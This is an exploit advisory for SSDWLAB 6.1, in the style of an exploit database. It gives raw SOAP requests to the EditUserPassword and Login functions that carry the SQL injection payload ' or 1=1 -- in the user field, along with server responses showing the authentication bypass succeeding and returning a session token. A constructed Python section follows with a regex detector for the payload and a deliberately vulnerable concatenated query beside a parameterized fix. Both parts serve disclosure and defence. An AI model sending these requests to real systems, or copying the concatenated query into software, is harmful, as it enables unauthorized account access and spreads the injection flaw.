# Exploit Title: SSDWLAB 6.1 - Authentication Bypass  
# Date: 2019-10-01  
# Exploit Author: Luis Buendía (exoticpayloads)  
# Vendor Homepage: http://www.sbpsoftware.com/  
# Version: 6.1  
# Tested on: IIS 7.5  
# CVE : Pending  
# Description: By injecting into the coUser parameter of the EditUserPassword SOAP function, it is possible to create a "fake" user and authenticate with it.  
  
Request to the EditUserPassword Function  
  
POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1  
Host: XXXXXXX.com  
Content-Type: text/xml; charset=utf-8  
Content-Length: 462  
SOAPAction: "http://tempuri.org/EditUserPassword"  
  
<?xml version="1.0" encoding="utf-8"?>  
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">  
<soap:Body>  
<EditUserPassword xmlns="http://tempuri.org/">  
<coUser>' or 1=1 --</coUser>  
<sOldPwd>string</sOldPwd>  
<sNewPwd>string</sNewPwd>  
<coLang>ENG</coLang>  
</EditUserPassword>  
</soap:Body>  
</soap:Envelope>  
  
Example of the response when the injection is successful  
  
HTTP/1.1 200 OK  
Cache-Control: private, max-age=0  
Content-Type: text/xml; charset=utf-8  
X-AspNet-Version: 4.0.30319  
X-Powered-By: XXX.XXX  
Content-Length: 421  
  
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><EditUserPasswordResponse xmlns="http://tempuri.org/"><EditUserPasswordResult><ListMsg /><ErrLevel>0</ErrLevel><MetaData /></EditUserPasswordResult></EditUserPasswordResponse></soap:Body></soap:Envelope>  
  
Request to Login After Successful Request  
  
POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1  
Host: XXXXXXX.com  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Referer: https://XXXXXXX.com/PATH-TO-WEB-SERVICE/main.swf/[[DYNAMIC]]/2  
Content-Type: text/xml; charset=utf-8  
SOAPAction: "http://tempuri.org/Login"  
Content-Length: 406  
  
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:s="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<SOAP-ENV:Body>  
<tns:Login xmlns:tns="http://tempuri.org/">  
<tns:sUser>' or 1=1 --</tns:sUser>  
<tns:sPwd>string</tns:sPwd>  
<tns:sLang>ENG</tns:sLang>  
</tns:Login>  
</SOAP-ENV:Body>  
</SOAP-ENV:Envelope>  
  
Example of a successful login  
  
HTTP/1.1 200 OK  
Cache-Control: private, max-age=0  
Content-Type: text/xml; charset=utf-8  
Vary: Accept-Encoding  
X-AspNet-Version: 4.0.30319  
X-Powered-By: XXX.XXX  
Connection: close  
Content-Length: 422  
  
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><LoginResponse xmlns="http://tempuri.org/"><LoginResult><ListMsg /><ErrLevel>0</ErrLevel><MetaData /><data>d62cc3c0b2e3413cb8b4a85b0fa6177b</data></LoginResult></LoginResponse></soap:Body></soap:Envelope>
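
The following is a constructed example added to this page, not code from the advisory or from the vendor: it parses a SOAP request of the shape shown above, flags the injection pattern in the user field so a WAF rule or log review can catch it, and contrasts a concatenated user lookup with the parameterized form that removes the bug. The users table, its column and the sample user names are assumptions, and sqlite3 stands in for the real back-end database.

```python
import re
import sqlite3
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
TNS = "http://tempuri.org/"
# Operation -> element that carries the user name, taken from the advisory's requests.
USER_FIELDS = {"EditUserPassword": "coUser", "Login": "sUser"}
# Shape of the advisory payload: a quote followed by OR/AND, or a SQL comment marker.
INJECTION_RE = re.compile(r"'\s*(or|and)\b|--|/\*", re.IGNORECASE)

# Constructed copy of the EditUserPassword request from the advisory (no XML declaration).
SAMPLE_REQUEST = (
    f'<soap:Envelope xmlns:soap="{SOAP_NS}"><soap:Body>'
    f'<EditUserPassword xmlns="{TNS}"><coUser>\' or 1=1 --</coUser>'
    "<sOldPwd>string</sOldPwd><sNewPwd>string</sNewPwd><coLang>ENG</coLang>"
    "</EditUserPassword></soap:Body></soap:Envelope>"
)


def extract_user(soap_body: str):
    """Return (operation, user value) for EditUserPassword/Login, or None otherwise."""
    body = ET.fromstring(soap_body).find(f"{{{SOAP_NS}}}Body")
    for op in (body if body is not None else []):
        name = op.tag.split("}")[-1]
        if name in USER_FIELDS:
            elem = op.find(f"{{{TNS}}}{USER_FIELDS[name]}")
            return name, (elem.text or "") if elem is not None else ""
    return None


def is_suspicious(user_value: str) -> bool:
    """Detection rule: True when the user field carries the injection pattern."""
    return INJECTION_RE.search(user_value) is not None


def make_db():
    """Assumed schema: a users table with a name column and two sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice'), ('bob')")
    return conn


def lookup_unsafe(conn, user_value):
    """String-concatenated WHERE clause: the defect class behind the advisory."""
    rows = conn.execute(f"SELECT name FROM users WHERE name = '{user_value}'").fetchall()
    return [r[0] for r in rows]


def lookup_safe(conn, user_value):
    """Parameterized query: the payload is compared as a literal string and matches nothing."""
    rows = conn.execute("SELECT name FROM users WHERE name = ?", (user_value,)).fetchall()
    return [r[0] for r in rows]
```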